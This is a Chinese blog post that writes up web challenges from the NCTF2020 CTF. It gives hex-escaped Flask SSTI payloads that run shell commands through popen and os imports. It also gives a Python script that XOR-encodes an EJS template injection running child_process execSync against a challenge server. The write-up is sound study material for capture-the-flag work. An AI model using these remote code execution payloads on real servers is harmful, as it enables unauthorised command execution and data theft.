<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="NCTF2020 WEB复现记录"><meta name="keywords" content="web,ctf,wp"><meta name="author" content="MOZac Connecter"><meta name="copyright" content="MOZac Connecter"><title>NCTF2020 WEB复现记录 | MOZac的小屋</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>(adsbygoogle = window.adsbygoogle || []).push({
  google_ad_client: 'ca-pub-7313518215964899',
  enable_page_level_ads: 'true'
});
</script><meta name="google-site-verification" content="UA-186375523"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '5.3.0'
} </script><meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="MOZac的小屋" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%A0%E5%B0%B1%E6%98%AF%E6%88%91%E7%9A%84master%E5%90%97"><span class="toc-number">1.</span> <span class="toc-text">你就是我的master吗</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B6%89%E5%8F%8A%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="toc-number">1.1.</span> <span class="toc-text">涉及知识点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0%E8%AE%B0%E5%BD%95"><span class="toc-number">1.2.</span> <span class="toc-text">复现记录</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B5%9B%E5%90%8E%E6%80%BB%E7%BB%93"><span class="toc-number">1.3.</span> <span class="toc-text">赛后总结</span></a></li><li class="toc-item toc-level-3"><a class="toc-link"><span class="toc-number">1.4.</span> <span class="toc-text"></span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WordPress"><span class="toc-number">2.</span> <span class="toc-text">WordPress</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B6%89%E5%8F%8A%E7%9F%A5%E8%AF%86%E7%82%B9-1"><span class="toc-number">2.1.</span> <span class="toc-text">涉及知识点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0%E8%AE%B0%E5%BD%95-amp-%E8%B5%9B%E5%90%8E%E5%8F%8D%E6%80%9D"><span class="toc-number">2.2.</span> <span class="toc-text">复现记录&amp;赛后反思</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JS-world"><span class="toc-number">3.</span> <span class="toc-text">JS-world</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B6%89%E5%8F%8A%E7%9F%A5%E8%AF%86%E7%82%B9-2"><span class="toc-number">3.1.</span> <span class="toc-text">涉及知识点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0%E8%AE%B0%E5%BD%95-1"><span class="toc-number">3.2.</span> <span class="toc-text">复现记录</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B5%9B%E5%90%8E%E6%80%BB%E7%BB%93-1"><span class="toc-number">3.3.</span> <span class="toc-text">赛后总结</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SimpleSimplePie"><span class="toc-number">4.</span> <span class="toc-text">SimpleSimplePie</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B6%89%E5%8F%8A%E7%9F%A5%E8%AF%86%E7%82%B9-3"><span class="toc-number">4.1.</span> <span class="toc-text">涉及知识点</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://s3.ax1x.com/2020/12/21/r0TN5t.png"></div><div class="author-info__name text-center">MOZac Connecter</div><div class="author-info__description text-center">安全人Mozac的平凡日常</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://space.bilibili.com/13299663">关注我</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">13</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">22</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">4</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">朋友们</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://www.vincehut.top/">Vince迷航者</a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">MOZac的小屋</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">主页</a><a class="site-page" href="/archives">文章</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">NCTF2020 WEB复现记录</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2021-01-07</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E6%AF%94%E8%B5%9B/">比赛</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h2 id="你就是我的master吗"><a href="#你就是我的master吗" class="headerlink" title="你就是我的master吗"></a>你就是我的master吗</h2><h3 id="涉及知识点"><a href="#涉及知识点" class="headerlink" title="涉及知识点"></a>涉及知识点</h3><p>Flask ssti(FLASK模板注入漏洞)</p>
<p>C转义字符绕过过滤</p>
<h3 id="复现记录"><a href="#复现记录" class="headerlink" title="复现记录"></a>复现记录</h3><p>打开题目页面</p>
<p><img src="https://uploader.shimo.im/f/n5Fb7Sc2P3Vyn2Hb.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p>基本没有有效信息，看源码</p>
<p><img src="https://uploader.shimo.im/f/ShrMXbcnt5YjoCx1.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p>提示可以传递一个name参数</p>
<p><img src="https://uploader.shimo.im/f/kKr36yWl9zy42Hmh.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p>测试后固定位置回显替换为提交的参数，考虑SSTI，测试加减乘除法</p>
<p><img src="https://uploader.shimo.im/f/rVmI0os9d5ubn4Xp.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p><img src="https://uploader.shimo.im/f/iSKAh7cD9wAWqyuc.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p><img src="https://uploader.shimo.im/f/k09y1fLL6YiiFgAZ.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p><img src="https://uploader.shimo.im/f/CVBefOIB5ymhyarv.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p>测试后发现“-”被过滤，+报错，但似乎对常规思路没有影响，于是直接开始测试并构造payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name&#x3D;&#123;&#123;&quot;&quot;.__class__&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>结果发现过滤，<br><img src="https://uploader.shimo.im/f/BPghNh1iVl36FfRE.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p>同时经过多个测试后发现单一关键词不会触发过滤且无回显，但是一旦构造可执行部分就会导致过滤，比赛中就是在此处落入坑中。</p>
<p>最后查了好多的绕过手段发现一种C语言转义字符过滤的，有点意思，可惜当时payload构造出了一点点小问题，调用属性的时候多了一位，117调用成118（查看属性列表的时候用的本地文本编辑器）</p>
<p><img src="https://uploader.shimo.im/f/b8KKKDiYEbzZURoF.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p>下面是完整非预期payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name&#x3D;&#123;&#123;&quot;&quot;[&quot;__class__&quot;][&quot;__base__&quot;][&quot;__subclasses__&quot;]()[117][&quot;__init__&quot;][&quot;__globals__&quot;][&quot;popen&quot;](&quot;dir&quot;)[&quot;read&quot;]()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>转义后：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name&#x3D;&#123;&#123;&quot;&quot;[&quot;\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f&quot;][&quot;\x5f\x5f\x62\x61\x73\x65\x5f\x5f&quot;][&quot;\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f&quot;]()[117][&quot;\x5f\x5f\x69\x6e\x69\x74\x5f\x5f&quot;][&quot;\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f&quot;][&quot;\x70\x6f\x70\x65\x6e&quot;](&quot;dir&quot;)[&quot;\x72\x65\x61\x64&quot;]()&#125;&#125;</span><br></pre></td></tr></table></figure>
<p>Done</p>
<h3 id="赛后总结"><a href="#赛后总结" class="headerlink" title="赛后总结"></a>赛后总结</h3><p>本题上可以明显看出我的问题在于绕过知识不够完善，接下来的学习中需要在这方面加强</p>
<p>同时积累一个小知识点，可以用&lt;class ‘_frozen_importlib._ModuleLock’&gt;这个属性来同样实现SSTI，下面放上官方payload，给自己提个醒</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?name&#x3D;&#123;&#123;&quot;&quot;[&quot;\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f&quot;][&quot;\x5f\x5f\x62\x61\x73\x65\x5f\x5f&quot;][&quot;\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f&quot;]()[64][&quot;\x5f\x5f\x69\x6e\x69\x74\x5f\x5f&quot;][&quot;\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f&quot;][&quot;\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f&quot;][&quot;\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f&quot;](&quot;\x6f\x73&quot;)[&quot;\x70\x6f\x70\x65\x6e&quot;](&quot;ls&quot;)[&quot;\x72\x65\x61\x64&quot;]()&#125;&#125;</span><br><span class="line">?name&#x3D;&#123;&#123;&quot;&quot;[&quot;__class__&quot;][&quot;__base__&quot;][&quot;__subclasses__&quot;]()[64][&quot;__init__&quot;][&quot;__globals__&quot;][&quot;__builtins__&quot;][&quot;__import__&quot;](&quot;os&quot;)[&quot;popen&quot;](&quot;ls&quot;)[&quot;read&quot;]()&#125;&#125;</span><br></pre></td></tr></table></figure>
<h3 id=""><a href="#" class="headerlink" title=""></a></h3><h2 id="WordPress"><a href="#WordPress" class="headerlink" title="WordPress"></a>WordPress</h2><h3 id="涉及知识点-1"><a href="#涉及知识点-1" class="headerlink" title="涉及知识点"></a>涉及知识点</h3><p>信息泄露</p>
<p>SQL注入</p>
<p>文件上传</p>
<p>一句话马</p>
<h3 id="复现记录-amp-赛后反思"><a href="#复现记录-amp-赛后反思" class="headerlink" title="复现记录&amp;赛后反思"></a>复现记录&amp;赛后反思</h3><p>源码未公开，无法复现</p>
<p>但是本质上偏向综合性，需要更加灵活的思路，给自己记一笔</p>
<h2 id="JS-world"><a href="#JS-world" class="headerlink" title="JS-world"></a>JS-world</h2><h3 id="涉及知识点-2"><a href="#涉及知识点-2" class="headerlink" title="涉及知识点"></a>涉及知识点</h3><p>python脚本</p>
<p>requests模块使用</p>
<p>JavaScript混淆</p>
<p>JavaScript代码阅读</p>
<h3 id="复现记录-1"><a href="#复现记录-1" class="headerlink" title="复现记录"></a>复现记录</h3><p>本地搭建环境，</p>
<p><img src="https://uploader.shimo.im/f/5elaZOfrlo2dRUxj.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p><img src="https://uploader.shimo.im/f/OqPJO0Mx6SlyEGOy.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p>唯一比较可疑的就是页面底部的一个输入框，尝试输入字符“12345”：</p>
<p><img src="https://uploader.shimo.im/f/SJ8EoFuLPikrAPpT.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p>给出了一个目录，先不着急，看看页面源码：</p>
<p><img src="https://uploader.shimo.im/f/ZZUvuoljoJorTluN.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p>出现了/js/script.js这个可疑JS文件，结合题目名猜测这个可能是源码，于是打开页面得到：</p>
<p><img src="https://uploader.shimo.im/f/3KL8BgCgvmaNH8Q8.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p>加密后的源码，此时需要两个模块，附上安装指令</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">npm install esprima</span><br><span class="line">npm install escodegen</span><br></pre></td></tr></table></figure>
<p>然后准备以下代码，用于还原混淆过的JS代码：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> esprima = <span class="built_in">require</span>(<span class="string">&#x27;esprima&#x27;</span>)</span><br><span class="line"><span class="keyword">var</span> escodegen = <span class="built_in">require</span>(<span class="string">&#x27;escodegen&#x27;</span>)</span><br><span class="line"><span class="comment">//参数context是要格式的js</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">formatJS</span>(<span class="params">content</span>)</span>&#123;</span><br><span class="line"><span class="keyword">var</span> ast=esprima.parseScript(content.toString());</span><br><span class="line"><span class="keyword">var</span> ast_to_json=<span class="built_in">JSON</span>.stringify(ast);</span><br><span class="line"><span class="built_in">console</span>.log(ast_to_json);</span><br><span class="line"><span class="keyword">var</span> ast1=<span class="built_in">JSON</span>.parse(ast_to_json);</span><br><span class="line"><span class="keyword">var</span> code=escodegen.generate(ast1);</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">&quot;&quot;</span>);</span><br><span class="line"><span class="built_in">console</span>.log(code);</span><br><span class="line"><span class="keyword">return</span> code;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//下面填写加密后的JS代码</span></span><br><span class="line">s=<span class="comment">//js混淆代码</span></span><br><span class="line">formatJS(s);</span><br></pre></td></tr></table></figure>
<p>破译后得到源码：（md源代码混淆得要命了！所以我截取关键的部分放上来，具体完整源码就放个截图恶心一下自己）</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">xor</span>(<span class="params">_0x2e08ba, _0x46b4b3</span>) </span>&#123;</span><br><span class="line">		<span class="keyword">var</span> _0x5498ac = _0x1656,</span><br><span class="line">			_0x1fcc86 = _0x2e08ba[_0x5498ac(<span class="string">&#x27;0x10&#x27;</span>)];</span><br><span class="line">		<span class="keyword">return</span> <span class="built_in">Array</span>[<span class="string">&#x27;prototype&#x27;</span>][_0x5498ac(<span class="string">&#x27;0x1&#x27;</span>)][<span class="string">&#x27;call&#x27;</span>](_0x46b4b3)[_0x5498ac(<span class="string">&#x27;0xb&#x27;</span>)](<span class="function"><span class="keyword">function</span> (<span class="params">_0x188695, _0x5c7c65</span>) </span>&#123;</span><br><span class="line">				<span class="keyword">var</span> _0xa12745 = _0x5498ac;</span><br><span class="line">				<span class="keyword">return</span> <span class="built_in">String</span>[<span class="string">&#x27;fromCharCode&#x27;</span>](_0x188695[_0xa12745(<span class="string">&#x27;0x6&#x27;</span>)](<span class="number">0x0</span>) ^ _0x2e08ba[_0x5c7c65 % _0x1fcc86][_0xa12745(<span class="string">&#x27;0x6&#x27;</span>)](<span class="number">0x0</span>));</span><br><span class="line">			&#125;)[_0x5498ac(<span class="string">&#x27;0x3&#x27;</span>)](<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">	&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">create</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">		<span class="keyword">var</span> _0x1bef85 = _0x1656,</span><br><span class="line">			_0x23132f = <span class="built_in">document</span>[_0x1bef85(<span class="string">&#x27;0x9&#x27;</span>)](<span class="string">&#x27;MyCode&#x27;</span>)[_0x1bef85(<span class="string">&#x27;0xe&#x27;</span>)];</span><br><span class="line">		_0x23132f = _0x23132f[_0x1bef85(<span class="string">&#x27;0x5&#x27;</span>)](<span class="regexp">/[\/\*\&#x27;\&quot;\`\&lt;\\&gt;\-\=\%\.]/g</span>, <span class="string">&#x27;&#x27;</span>);</span><br><span class="line">		<span class="keyword">var</span> _0x1658d5 = _0x1bef85(<span class="string">&#x27;0x8&#x27;</span>) + _0x23132f + _0x1bef85(<span class="string">&#x27;0x2&#x27;</span>);</span><br><span class="line">		_0x1658d5 = btoa(xor(_0x1bef85(<span class="string">&#x27;0xc&#x27;</span>), _0x1658d5));</span><br><span class="line">		<span class="keyword">var</span> _0x23601e = <span class="keyword">new</span> XMLHttpRequest();</span><br><span class="line">		_0x23601e[<span class="string">&#x27;open&#x27;</span>](_0x1bef85(<span class="string">&#x27;0x13&#x27;</span>), _0x1bef85(<span class="string">&#x27;0x7&#x27;</span>), !! []),</span><br><span class="line">		_0x23601e[<span class="string">&#x27;setRequestHeader&#x27;</span>](_0x1bef85(<span class="string">&#x27;0x11&#x27;</span>), _0x1bef85(<span class="string">&#x27;0xd&#x27;</span>));</span><br><span class="line">		<span class="keyword">var</span> _0x3deb5a = _0x1bef85(<span class="string">&#x27;0x4&#x27;</span>) + <span class="built_in">escape</span>(_0x1658d5);</span><br><span class="line">		<span class="keyword">return</span> _0x23601e[_0x1bef85(<span class="string">&#x27;0xa&#x27;</span>)](_0x3deb5a),</span><br><span class="line">		alert(<span class="string">&#x27;Done.\x0aCheck\x20/templates\x20now.&#x27;</span>),</span><br><span class="line">		<span class="string">&#x27;&#x27;</span>;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p><img src="https://uploader.shimo.im/f/DHDMxchRDyYkkFKf.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p>备注：此处解密有问题，需要再做JS混淆类的研究，目前猜测是因为存储字符串的变量将b64后的字符串大小写交换导致的，此处直接掏官方给出的解混淆后的脚本</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">xor</span>(<span class="params">key, value</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">var</span> keyLen = key.length;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Array</span>.prototype.slice.call(value).map(<span class="function"><span class="keyword">function</span>(<span class="params">char, idx</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">String</span>.fromCharCode(char.charCodeAt(<span class="number">0</span>) ^ key[idx % keyLen].charCodeAt(<span class="number">0</span>));</span><br><span class="line">    &#125;).join(<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">create</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">var</span> code=<span class="built_in">document</span>.getElementById(<span class="string">&quot;MyCode&quot;</span>).value;</span><br><span class="line">    code=code.replace(<span class="regexp">/[\/\*\&#x27;\&quot;\`\&lt;\\&gt;\-\=\%\.]/g</span>,<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">    <span class="keyword">var</span> data=<span class="string">`&lt;html&gt;</span></span><br><span class="line"><span class="string">&lt;head&gt;</span></span><br><span class="line"><span class="string">&lt;link rel=&quot;stylesheet&quot; href=&quot;/bootstrap/css/bootstrap.min.css&quot;&gt;</span></span><br><span class="line"><span class="string">&lt;title&gt;Home - Your Template</span></span><br><span class="line"><span class="string">&lt;/title&gt;</span></span><br><span class="line"><span class="string">&lt;/head&gt;</span></span><br><span class="line"><span class="string">&lt;h1&gt;Proudly presented by ejs&lt;/h1&gt;</span></span><br><span class="line"><span class="string">&lt;body&gt;</span></span><br><span class="line"><span class="string">&lt;code&gt;`</span>+ code +<span class="string">`&lt;/code&gt;</span></span><br><span class="line"><span class="string">&lt;/body&gt;</span></span><br><span class="line"><span class="string">&lt;/html&gt;`</span>;</span><br><span class="line">    data = btoa(xor(<span class="string">&quot;r5NmfIzU1uzl6Wp&quot;</span>, data));</span><br><span class="line">    <span class="keyword">var</span> xmlRequest = <span class="keyword">new</span> XMLHttpRequest();</span><br><span class="line">    xmlRequest.open(<span class="string">&quot;POST&quot;</span>, <span class="string">&quot;/create&quot;</span>, <span class="literal">true</span>);</span><br><span class="line">    xmlRequest.setRequestHeader(<span class="string">&quot;Content-type&quot;</span>, <span class="string">&quot;application/x-www-form-urlencoded&quot;</span>);</span><br><span class="line">    <span class="keyword">var</span> body = <span class="string">&quot;code=&quot;</span> + <span class="built_in">escape</span>(data);</span><br><span class="line">    xmlRequest.send(body);</span><br><span class="line">    alert(<span class="string">`Done.\nCheck /templates now.`</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>行，下一步，看看那个别忽略的目录<br><img src="https://uploader.shimo.im/f/2CIbF5SAYlAvXluS.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<p>ejs？啥玩意啊？哦拿来渲染页面的，那没事了，接下来就是构造payload然后写脚本了：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> base64 <span class="keyword">import</span> b64encode <span class="keyword">as</span> b64</span><br><span class="line">url=<span class="string">&#x27;http://49.234.124.192:8090&#x27;</span></span><br><span class="line"><span class="comment">#目标攻击地址</span></span><br><span class="line">PAYLOAD=<span class="string">&quot;&lt;%- global.process.mainModule.require(&#x27;child_process&#x27;).execSync(&#x27;cat /flag.txt&#x27;) %&gt;&quot;</span></span><br><span class="line"><span class="comment">#ejs模板语句，创建一个子进程并用execSync方法执行cmd指令</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">xor</span>(<span class="params">key,string</span>):</span></span><br><span class="line">    index = <span class="number">0</span></span><br><span class="line">    length =<span class="built_in">len</span>(key) <span class="comment">#payload长度计算</span></span><br><span class="line">    payload=<span class="string">&#x27;&#x27;</span></span><br><span class="line">    chars=<span class="built_in">list</span>(<span class="built_in">map</span>(<span class="built_in">str</span>,string))</span><br><span class="line">    <span class="keyword">for</span> char <span class="keyword">in</span> chars:</span><br><span class="line">        payload = payload + <span class="built_in">chr</span>(<span class="built_in">ord</span>(char) ^ <span class="built_in">ord</span>(key[ index % length]))</span><br><span class="line">        <span class="comment">#payload每位ascii值与对应secret值位进行异或</span></span><br><span class="line">        index = index + <span class="number">1</span></span><br><span class="line">    <span class="keyword">return</span> payload</span><br><span class="line"><span class="comment">#自定义xor函数</span></span><br><span class="line">exp = b64(xor(<span class="string">&#x27;r5NmfIzU1uzl6Wp&#x27;</span>,PAYLOAD).encode()).decode()</span><br><span class="line">s = requests.session()</span><br><span class="line">s.get(url)</span><br><span class="line">s.post(url+<span class="string">&#x27;/create&#x27;</span>,data=&#123;<span class="string">&#x27;code&#x27;</span>: exp&#125;)</span><br><span class="line"><span class="comment">#通过分析可知道通过create发送指创建自定义页面，好，冲</span></span><br><span class="line">r=s.get(url+<span class="string">&#x27;/templates&#x27;</span>)</span><br><span class="line">print(r.text)</span><br></pre></td></tr></table></figure>
<p>done<br><img src="https://uploader.shimo.im/f/h5LONB8Q2kEpdfva.png!thumbnail?fileGuid=pdywxwKqrygHrGjg" alt="图片"></p>
<h3 id="赛后总结-1"><a href="#赛后总结-1" class="headerlink" title="赛后总结"></a>赛后总结</h3><p>这道题的主要难点在于破译原始的JS代码以获取secret值和解读异或函数</p>
<p>对于我而言最难的点在于破解混淆后的JS代码，这个真的耗了很长时间，但是没有太多成效，还是得想办法看看怎么混淆的。</p>
<h2 id="SimpleSimplePie"><a href="#SimpleSimplePie" class="headerlink" title="SimpleSimplePie"></a>SimpleSimplePie</h2><h3 id="涉及知识点-3"><a href="#涉及知识点-3" class="headerlink" title="涉及知识点"></a>涉及知识点</h3><p>反序列化</p>
<p>gopher协议</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">MOZac Connecter</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://mozac-void.yixiangtang.icu/2021/01/07/NCTF2020/">https://mozac-void.yixiangtang.icu/2021/01/07/NCTF2020/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://mozac-void.yixiangtang.icu">MOZac的小屋</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web/">web</a><a class="post-meta__tags" href="/tags/ctf/">ctf</a><a class="post-meta__tags" href="/tags/wp/">wp</a></div><div class="social-share pull-right" data-disabled="facebook"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2021/04/04/RCE-BYPASS/"><i class="fa fa-chevron-left">  </i><span>RCE Bypass 远程命令执行绕过技巧</span></a></div><div class="next-post pull-right"><a href="/2020/12/31/newyear/"><span>再见2020，你好2021</span><i class="fa fa-chevron-right"></i></a></div></nav><div class="post-adv"><iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=728 height=110 src="//music.163.com/outchain/player?type=0&id=2110349418&auto=1&height=90"></iframe></div><div id="lv-container" data-id="city" data-uid="MTAyMC81MjI0My8yODcyMg=="><script>(function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
